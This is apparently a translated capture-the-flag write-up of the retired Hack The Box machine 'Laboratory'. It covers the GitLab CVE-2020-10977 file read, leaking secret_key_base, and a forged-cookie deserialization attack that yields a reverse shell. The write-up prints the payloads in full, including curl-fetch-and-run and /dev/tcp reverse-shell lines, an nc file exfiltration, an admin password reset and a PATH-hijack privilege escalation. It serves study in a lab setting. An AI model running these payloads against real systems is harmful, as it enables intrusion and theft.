This article is intended solely for technical exchange, study and research. Using the techniques described here for illegal purposes or to cause damage is strictly forbidden; any consequences are unrelated to the author who published this article.
The target is a retired machine that the author accessed with a purchased VIP subscription; its IP address shows as 10.10.10.216.
This run uses https://github.com/Tib3rius/AutoRecon for automated, all-round scanning.
Information gathering and enumeration. https://github.com/codingo/Reconnoitre works similarly to autorecon.
autorecon 10.10.10.216 -o ./Laboratory-autorecon
sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.216
or
sudo masscan -p1-65535,U:1-65535 10.10.10.216 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
sudo nmap -Pn -sV -sC -p$ports 10.10.10.216
Scan results obtained:
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan results show that the target must be reached by hostname, so add the hostnames to the local hosts file.
Append to the hosts file:
sudo -- sh -c "echo '10.10.10.216 laboratory.htb' >> /etc/hosts"
sudo -- sh -c "echo '10.10.10.216 git.laboratory.htb' >> /etc/hosts"
Visit these hostnames.
Register a user cntf and visit https://git.laboratory.htb. Clicking through every page, the Help menu shows GitLab version 12.8.1. A quick Google search shows this version has an arbitrary file read vulnerability.
References:
https://hackerone.com/reports/827052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10977
The exploitation procedure, roughly: create two projects, open a new issue that references the file to be read (for example, reading the contents of the passwd file), then move the issue to the other newly created project; the file will have been read and the corresponding attachment can be downloaded. Automated exploit code is available at https://github.com/thewhiteh4t/cve-2020-10977
Result of the exploitation:
python3 cve_2020_10977.py https://git.laboratory.htb cntf cntfcntf
[>] Absolute Path to File : /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
---
production:
  db_key_base: 627773a77f567a5853a5c6652018f3f6e41d04aa53ed1e0df33c66b04ef0c38b88f402e0e73ba7676e93f1e54e425f74d59528fb35b170a1b9d5ce620bc11838
  secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
  otp_key_base: db3432d6fa4c43e68bf7024f3c92fea4eeea1f6be1e6ebd6bb6e40e930f0933068810311dc9f0ec78196faa69e0aac01171d62f4e225d61e0b84263903fd06af
Process demonstration:
Here, by setting up a local GitLab instance and replacing its secret_key_base with the leaked one, command execution can be achieved. The steps are as follows.
Build the same GitLab version as the target with Docker on the local Kali machine. Install Docker first; see https://zhuanlan.zhihu.com/p/82361096
sudo docker pull gitlab/gitlab-ee:12.8.1-ee.0
sudo docker run -it gitlab/gitlab-ee:12.8.1-ee.0 sh
/opt/gitlab/embedded/bin/runsvdir-start &
gitlab-rails console
nano /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
Replace secret_key_base with the target's secret_key_base:
3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
Once it is replaced, a cookie can be generated; embed the reverse-shell command in it to trigger the reverse shell.
Run the following command to enter the console:
gitlab-rails console
Then execute the following:
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `curl {Your_IP}/Shell.sh -o /tmp/Shell.sh && chmod 777 /tmp/Shell.sh && bash /tmp/Shell.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
or
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i>& /dev/tcp/10.10.14.16/8833 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
During testing, the reverse shell connected back already while running the third- and fourth-from-last steps above; that shell came from the GitLab instance built locally on Kali, not from the target, so it can be ignored. Press ctrl+c to interrupt, run the last two steps to obtain the cookie, then trigger the reverse-shell code.
Cookie obtained:
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--ded553d0f50b56445da7778756a4f2822d1835d6
Trigger the reverse shell:
curl -vvv 'https://git.laboratory.htb/users/sign_in' -k -b "experimentation_subject_id=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--ded553d0f50b56445da7778756a4f2822d1835d6"
Reverse shell obtained. Once that succeeds, spawn a tty shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=linux
Change the password:
user = User.find(1)
user.password = '123456789'
user.password_confirmation = '123456789'
user.save!
exit
irb(main):001:0> user = User.find(1)
user = User.find(1)
=> #<User id:1 @dexter>
irb(main):002:0> user.password = '123456789'
user.password = '123456789'
=> "123456789"
irb(main):003:0> user.password_confirmation = '123456789'
user.password_confirmation = '123456789'
=> "123456789"
irb(main):004:0> user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: fb1c0851-a7de-4072-b8d6-b27a65c36458) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007fea1b3254d0 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):005:0> exit
exit
Log in to the target's GitLab web application.
After logging in successfully, obtain the private key, copy it to the local Kali machine, set its permissions to 600, then log in over ssh.
With access to the target, start information gathering using https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh. The gathered information shows that docker-security has the setuid bit set:
-rwsr-xr-x 1 root dexter 16720 Aug 28 2020 docker-security
Transfer the discovered binary to Kali using nc.
Send docker-security to the local Kali machine with nc for analysis:
kali: nc -lvnp 9933 > docker-security
target: nc 10.10.14.16 9933 < /usr/local/bin/docker-security
Trace the file with ltrace:
kali@kali:~/Downloads/htb/laboratory$ ltrace ./docker-security
setuid(0) = -1
setgid(0) = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
+++ exited (status 0) +++
The file invokes the chmod command by name, so privileges can be escalated by hijacking PATH; see https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
Privilege escalation
Save the following code as chmod.c:
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>

int main(){
    /* Keep the uid inherited from the setuid parent, then spawn a shell. */
    setuid(getuid());
    system("/bin/bash");
    return 0;
}
gcc -o chmod chmod.c
scp -i laboratory_id_rsa chmod dexter@10.10.10.216:/tmp/
Escalate:
export PATH=/tmp/:$PATH
/usr/local/bin/docker-security